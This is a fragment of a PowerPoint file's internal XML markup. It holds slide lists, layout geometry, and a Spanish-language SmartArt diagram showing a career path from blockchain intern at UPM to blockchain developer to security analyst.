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4"/>
    <p:sldMasterId id="2147483723" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId46"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId47"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="368" r:id="rId6"/>
    <p:sldId id="471" r:id="rId7"/>
    <p:sldId id="478" r:id="rId8"/>
    <p:sldId id="472" r:id="rId9"/>
    <p:sldId id="473" r:id="rId10"/>
    <p:sldId id="476" r:id="rId11"/>
    <p:sldId id="474" r:id="rId12"/>
    <p:sldId id="506" r:id="rId13"/>
    <p:sldId id="477" r:id="rId14"/>
    <p:sldId id="479" r:id="rId15"/>
    <p:sldId id="507" r:id="rId16"/>
    <p:sldId id="508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87" r:id="rId25"/>
    <p:sldId id="488" r:id="rId26"/>
    <p:sldId id="489" r:id="rId27"/>
    <p:sldId id="490" r:id="rId28"/>
    <p:sldId id="491" r:id="rId29"/>
    <p:sldId id="492" r:id="rId30"/>
    <p:sldId id="475" r:id="rId31"/>
    <p:sldId id="493" r:id="rId32"/>
    <p:sldId id="494" r:id="rId33"/>
    <p:sldId id="495" r:id="rId34"/>
    <p:sldId id="498" r:id="rId35"/>
    <p:sldId id="496" r:id="rId36"/>
    <p:sldId id="497" r:id="rId37"/>
    <p:sldId id="499" r:id="rId38"/>
    <p:sldId id="505" r:id="rId39"/>
    <p:sldId id="500" r:id="rId40"/>
    <p:sldId id="501" r:id="rId41"/>
    <p:sldId id="502" r:id="rId42"/>
    <p:sldId id="503" r:id="rId43"/>
    <p:sldId id="504" r:id="rId44"/>
    <p:sldId id="395" r:id="rId45"/>
  </p:sldIdLst>
  <p:sldSz cx="16256000" cy="9144000"/>
  <p:notesSz cx="16256000" cy="9144000"/>
  <p:embeddedFontLs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73"/>
    <a:srgbClr val="222C4A"/>
    <a:srgbClr val="D8D8D8"/>
    <a:srgbClr val="BFBFB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928AD-2CAF-4910-9E44-D5DD7D74DE7B}" v="364" dt="2024-03-19T12:46:12.13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620" y="4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4" y="-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1.fntdata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3F932B-AA9C-4E3F-B637-6F872ACD60E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2740320-5CBF-47F2-BB20-C5929C48DBB2}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1"/>
            <a:t>Blockahin</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1"/>
            <a:t>Intern</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0"/>
            <a:t> (UPM)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61149D55-53F5-4223-838B-4B512FBAE441}" type="parTrans" cxnId="{CBA70C30-9A96-4172-A378-302DD8305397}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1EA2214-C114-4B60-897C-59C0D28E783C}" type="sibTrans" cxnId="{CBA70C30-9A96-4172-A378-302DD8305397}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2194953-3A0B-4644-8C32-5F40D3272DAD}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1"/>
            <a:t>Blockchain</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1"/>
            <a:t>developer</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED050FF8-9A30-4BDA-BF53-21A3059FFE36}" type="parTrans" cxnId="{26AF82AF-B4B4-4682-BFDD-94FBE9D39A63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F56FB0E3-506F-4975-B5D4-AD459F675E9E}" type="sibTrans" cxnId="{26AF82AF-B4B4-4682-BFDD-94FBE9D39A63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07209EE0-99D5-479B-9754-2E353B738466}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0"/>
            <a:t>Security </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1"/>
            <a:t>Analyst</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F1CA849-3E1A-4D76-8716-53E0D7571124}" type="parTrans" cxnId="{E8E78B2F-C5A4-427F-A480-01DFB705BAA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A8D7128-EF77-4698-BA23-716E541115E1}" type="sibTrans" cxnId="{E8E78B2F-C5A4-427F-A480-01DFB705BAA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37499638-B28A-4A79-BB1D-30A8C537015B}" type="pres">
      <dgm:prSet presAssocID="{2D3F932B-AA9C-4E3F-B637-6F872ACD60E7}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02A0479C-8DA3-49A0-A2D0-6AD9EA556C98}" type="pres">
      <dgm:prSet presAssocID="{D2740320-5CBF-47F2-BB20-C5929C48DBB2}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{536E1DA8-C591-4A2B-8907-D7B022246A24}" type="pres">
      <dgm:prSet presAssocID="{D1EA2214-C114-4B60-897C-59C0D28E783C}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEAB1CB8-E3B1-4532-A43F-24A7FA0781B3}" type="pres">
      <dgm:prSet presAssocID="{D1EA2214-C114-4B60-897C-59C0D28E783C}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9071D94-474B-4936-9C0A-112A8AB78A2C}" type="pres">
      <dgm:prSet presAssocID="{F2194953-3A0B-4644-8C32-5F40D3272DAD}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{291E1503-68CB-4544-AAC8-FDCCBE40D603}" type="pres">
      <dgm:prSet presAssocID="{F56FB0E3-506F-4975-B5D4-AD459F675E9E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C844A0F-DC2A-4BDA-BAE9-96F968E99DE9}" type="pres">
      <dgm:prSet presAssocID="{F56FB0E3-506F-4975-B5D4-AD459F675E9E}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A256D92A-15FD-495A-ADBF-8F4BD0471DB1}" type="pres">
      <dgm:prSet presAssocID="{07209EE0-99D5-479B-9754-2E353B738466}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1DD0781A-E670-4D5E-AFE1-E67BF6B759CE}" type="presOf" srcId="{07209EE0-99D5-479B-9754-2E353B738466}" destId="{A256D92A-15FD-495A-ADBF-8F4BD0471DB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E8E78B2F-C5A4-427F-A480-01DFB705BAA0}" srcId="{2D3F932B-AA9C-4E3F-B637-6F872ACD60E7}" destId="{07209EE0-99D5-479B-9754-2E353B738466}" srcOrd="2" destOrd="0" parTransId="{3F1CA849-3E1A-4D76-8716-53E0D7571124}" sibTransId="{8A8D7128-EF77-4698-BA23-716E541115E1}"/>
    <dgm:cxn modelId="{CBA70C30-9A96-4172-A378-302DD8305397}" srcId="{2D3F932B-AA9C-4E3F-B637-6F872ACD60E7}" destId="{D2740320-5CBF-47F2-BB20-C5929C48DBB2}" srcOrd="0" destOrd="0" parTransId="{61149D55-53F5-4223-838B-4B512FBAE441}" sibTransId="{D1EA2214-C114-4B60-897C-59C0D28E783C}"/>
    <dgm:cxn modelId="{8BA31F34-88FD-4136-87A9-26A4BB01DC9D}" type="presOf" srcId="{2D3F932B-AA9C-4E3F-B637-6F872ACD60E7}" destId="{37499638-B28A-4A79-BB1D-30A8C537015B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DCCF9C45-3C93-4F7C-93C6-14155181202B}" type="presOf" srcId="{D2740320-5CBF-47F2-BB20-C5929C48DBB2}" destId="{02A0479C-8DA3-49A0-A2D0-6AD9EA556C98}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2106A74F-B818-4128-8606-953C837B004A}" type="presOf" srcId="{F56FB0E3-506F-4975-B5D4-AD459F675E9E}" destId="{291E1503-68CB-4544-AAC8-FDCCBE40D603}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{90D5777C-785A-4396-9DF3-F986BCC28C53}" type="presOf" srcId="{D1EA2214-C114-4B60-897C-59C0D28E783C}" destId="{536E1DA8-C591-4A2B-8907-D7B022246A24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1F4AD57D-6119-43DB-97DC-44FD65F93825}" type="presOf" srcId="{D1EA2214-C114-4B60-897C-59C0D28E783C}" destId="{FEAB1CB8-E3B1-4532-A43F-24A7FA0781B3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{755F8D7F-C2FC-4AB8-BED1-4F6E591BAD13}" type="presOf" srcId="{F56FB0E3-506F-4975-B5D4-AD459F675E9E}" destId="{5C844A0F-DC2A-4BDA-BAE9-96F968E99DE9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{26AF82AF-B4B4-4682-BFDD-94FBE9D39A63}" srcId="{2D3F932B-AA9C-4E3F-B637-6F872ACD60E7}" destId="{F2194953-3A0B-4644-8C32-5F40D3272DAD}" srcOrd="1" destOrd="0" parTransId="{ED050FF8-9A30-4BDA-BF53-21A3059FFE36}" sibTransId="{F56FB0E3-506F-4975-B5D4-AD459F675E9E}"/>
    <dgm:cxn modelId="{8BA514E1-2B7B-4CEA-9231-E93AF284EF8B}" type="presOf" srcId="{F2194953-3A0B-4644-8C32-5F40D3272DAD}" destId="{C9071D94-474B-4936-9C0A-112A8AB78A2C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{644EB3ED-15BF-4EA0-9103-F1B6CCE00D56}" type="presParOf" srcId="{37499638-B28A-4A79-BB1D-30A8C537015B}" destId="{02A0479C-8DA3-49A0-A2D0-6AD9EA556C98}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DB2CD7B1-D99C-4CA7-8149-92BD9A0DEBB9}" type="presParOf" srcId="{37499638-B28A-4A79-BB1D-30A8C537015B}" destId="{536E1DA8-C591-4A2B-8907-D7B022246A24}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{86F7D302-44E7-48A2-A8FA-CE6426437DBB}" type="presParOf" srcId="{536E1DA8-C591-4A2B-8907-D7B022246A24}" destId="{FEAB1CB8-E3B1-4532-A43F-24A7FA0781B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{C33AE0F0-5726-4CDD-98FF-06DB5E652575}" type="presParOf" srcId="{37499638-B28A-4A79-BB1D-30A8C537015B}" destId="{C9071D94-474B-4936-9C0A-112A8AB78A2C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E39DFF3E-3218-4F08-82EC-B87314D7146A}" type="presParOf" srcId="{37499638-B28A-4A79-BB1D-30A8C537015B}" destId="{291E1503-68CB-4544-AAC8-FDCCBE40D603}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F082593A-65B7-43D0-BD58-1F9F126631E0}" type="presParOf" srcId="{291E1503-68CB-4544-AAC8-FDCCBE40D603}" destId="{5C844A0F-DC2A-4BDA-BAE9-96F968E99DE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F143F1BF-E8EE-4B57-BF87-F5F0800A7E35}" type="presParOf" srcId="{37499638-B28A-4A79-BB1D-30A8C537015B}" destId="{A256D92A-15FD-495A-ADBF-8F4BD0471DB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0479C-8DA3-49A0-A2D0-6AD9EA556C98}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7058" y="828313"/>
          <a:ext cx="2109825" cy="1265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Blockahin</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2400" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2400" kern="1200" dirty="0" err="1"/>
            <a:t>Intern</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2400" kern="1200" dirty="0"/>
            <a:t> (UPM)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="44135" y="865390"/>
        <a:ext cx="2035671" cy="1191741"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{536E1DA8-C591-4A2B-8907-D7B022246A24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2327867" y="1199643"/>
          <a:ext cx="447283" cy="5232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900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2327867" y="1304290"/>
        <a:ext cx="313098" cy="313942"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C9071D94-474B-4936-9C0A-112A8AB78A2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2960814" y="828313"/>
          <a:ext cx="2109825" cy="1265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Blockchain</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2400" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2400" kern="1200" dirty="0" err="1"/>
            <a:t>developer</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2997891" y="865390"/>
        <a:ext cx="2035671" cy="1191741"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{291E1503-68CB-4544-AAC8-FDCCBE40D603}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5281622" y="1199643"/>
          <a:ext cx="447283" cy="5232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900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5281622" y="1304290"/>
        <a:ext cx="313098" cy="313942"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A256D92A-15FD-495A-ADBF-8F4BD0471DB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5914570" y="828313"/>
          <a:ext cx="2109825" cy="1265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Security </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2400" kern="1200" dirty="0" err="1"/>
            <a:t>Analyst</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5951647" y="865390"/>
        <a:ext cx="2035671" cy="119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6C24C3-F139-49E3-B069-61C3FA3AA3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Verdan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204E8-78A2-4CF2-A4AA-BFBD06F563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2F402-0859-4E8A-B0F4-D7F367FAD6FF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3/18/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin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3328B-61CE-4134-ABE8-F97CB812E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428AA-A79F-4111-BE28-F11ED24AD3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4D7A9-88BA-4A32-BAB9-2E411D60C92D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr 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43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78A1F466-B7C4-4557-B60F-A84D555FAD1B}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>18/03/2024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7FE9A1F5-4A2A-448C-ABA7-4ABB927911D5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66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9A1F5-4A2A-448C-ABA7-4ABB927911D5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00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2438400" y="4774690"/>
            <a:ext cx="11379200" cy="86092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55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5384800" y="1934034"/>
            <a:ext cx="5486400" cy="1300936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14427187" y="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1534160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200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ub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1" y="647260"/>
            <a:ext cx="1828798" cy="43144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5600" y="1828800"/>
            <a:ext cx="9144000" cy="4572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9855200" y="9143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713066" y="6400800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14427200" y="5486400"/>
            <a:ext cx="1825625" cy="1827530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51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5600" y="1828800"/>
            <a:ext cx="9144000" cy="4572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9855200" y="9143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713066" y="6400800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14427200" y="5486400"/>
            <a:ext cx="1825625" cy="1827530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6398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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76858CF1-1FE0-48C5-9C43-47EFD7F92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5600" y="1828800"/>
            <a:ext cx="9144000" cy="4572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00.Subheading</a:t>
            </a:r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1ABED16D-E05F-4052-AFDC-7D0B069E4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9EE1458B-1ACC-4A60-A6DA-3A183AD4A703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9855200" y="9143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14AF817-4FA3-4511-BF85-552078C6E679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713066" y="6400800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7F872C-9C1D-4419-83CD-C89DB3A9AD0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427200" y="5486400"/>
            <a:ext cx="1825625" cy="1827530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59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1699" y="2652632"/>
            <a:ext cx="14267320" cy="205471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36407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1699" y="2652632"/>
            <a:ext cx="14267320" cy="1970077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="180975" indent="-198000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288000" indent="-198000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="396000" indent="-19685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504000" indent="-180000">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="612000" indent="-198000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="13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055759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1699" y="2652632"/>
            <a:ext cx="6629400" cy="1922372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146CF11-ED2C-4591-88BE-369AC6EB33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2501" y="2652632"/>
            <a:ext cx="6629400" cy="1922372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72138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1699" y="2652632"/>
            <a:ext cx="4212167" cy="1922372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32D763-A691-4EC4-9C13-3AFE8C778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564" y="2652632"/>
            <a:ext cx="4212167" cy="1922372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2815573-BF96-4315-998A-9A2D6B618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29427" y="2652632"/>
            <a:ext cx="4212167" cy="1922372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400262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20759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6FBA34-91D9-42CD-A3FE-DC53ABE99F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85200" y="2743200"/>
            <a:ext cx="6756400" cy="5470532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sz="1600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700" y="930268"/>
            <a:ext cx="12407900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1699" y="2652632"/>
            <a:ext cx="6629401" cy="1922372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F8A56-100E-4902-968B-3CDFE43D6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676426" y="8165598"/>
            <a:ext cx="5486400" cy="10156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83881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755A9E-B5F9-42B8-A663-09F0B19A19E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="52832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3DC93F4-A945-42B6-9692-126B44277D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283200" cy="9143998"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 9143998"/>
              <a:gd name="connsiteX1" fmla="*/ 3454400 w 5283200"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 9143998"/>
              <a:gd name="connsiteX2" fmla="*/ 3454400 w 5283200"/>
              <a:gd name="connsiteY2" fmla="*/ 914400 h 9143998"/>
              <a:gd name="connsiteX3" fmla="*/ 4368800 w 5283200"/>
              <a:gd name="connsiteY3" fmla="*/ 914400 h 9143998"/>
              <a:gd name="connsiteX4" fmla="*/ 4368800 w 5283200"/>
              <a:gd name="connsiteY4" fmla="*/ 1828800 h 9143998"/>
              <a:gd name="connsiteX5" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY5" fmla="*/ 1828800 h 9143998"/>
              <a:gd name="connsiteX6" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY6" fmla="*/ 9143998 h 9143998"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY7" fmla="*/ 9143998 h 9143998"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY8" fmla="*/ 9143403 h 9143998"/>
              <a:gd name="connsiteX9" fmla="*/ 912533 w 5283200"/>
              <a:gd name="connsiteY9" fmla="*/ 9143403 h 9143998"/>
              <a:gd name="connsiteX10" fmla="*/ 912533 w 5283200"/>
              <a:gd name="connsiteY10" fmla="*/ 8230869 h 9143998"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY11" fmla="*/ 8230869 h 914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3200" h="9143998">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3454400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3454400" y="914400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368800" y="914400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368800" y="1828800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="1828800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="9143998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9143998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9143403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912533" y="9143403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912533" y="8230869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84900" y="930268"/>
            <a:ext cx="7124700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4900" y="2652632"/>
            <a:ext cx="9012555" cy="1922372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15136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2438400" y="4774690"/>
            <a:ext cx="11379200" cy="86092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55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5384800" y="1934034"/>
            <a:ext cx="5486400" cy="1300936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tx2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14427187" y="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1534160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604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4A3B4F-5311-4EE8-988B-706C2D0D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283200" cy="9144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 9144000"/>
              <a:gd name="connsiteX1" fmla="*/ 3454400 w 5283200"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 9144000"/>
              <a:gd name="connsiteX2" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 9144000"/>
              <a:gd name="connsiteX3" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY3" fmla="*/ 1828800 h 9144000"/>
              <a:gd name="connsiteX4" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY4" fmla="*/ 3657599 h 9144000"/>
              <a:gd name="connsiteX5" fmla="*/ 4368800 w 5283200"/>
              <a:gd name="connsiteY5" fmla="*/ 3657599 h 9144000"/>
              <a:gd name="connsiteX6" fmla="*/ 4368800 w 5283200"/>
              <a:gd name="connsiteY6" fmla="*/ 4571999 h 9144000"/>
              <a:gd name="connsiteX7" fmla="*/ 3454400 w 5283200"/>
              <a:gd name="connsiteY7" fmla="*/ 4571999 h 9144000"/>
              <a:gd name="connsiteX8" fmla="*/ 3454400 w 5283200"/>
              <a:gd name="connsiteY8" fmla="*/ 5486399 h 9144000"/>
              <a:gd name="connsiteX9" fmla="*/ 4368800 w 5283200"/>
              <a:gd name="connsiteY9" fmla="*/ 5486399 h 9144000"/>
              <a:gd name="connsiteX10" fmla="*/ 4368800 w 5283200"/>
              <a:gd name="connsiteY10" fmla="*/ 4571999 h 9144000"/>
              <a:gd name="connsiteX11" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY11" fmla="*/ 4571999 h 9144000"/>
              <a:gd name="connsiteX12" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY12" fmla="*/ 9143998 h 9144000"/>
              <a:gd name="connsiteX13" fmla="*/ 5283200 w 5283200"/>
              <a:gd name="connsiteY13" fmla="*/ 9144000 h 9144000"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY14" fmla="*/ 9144000 h 9144000"/>
              <a:gd name="connsiteX15" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY15" fmla="*/ 9143998 h 9144000"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY16" fmla="*/ 9143403 h 9144000"/>
              <a:gd name="connsiteX17" fmla="*/ 0 w 5283200"/>
              <a:gd name="connsiteY17" fmla="*/ 8230869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9144000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
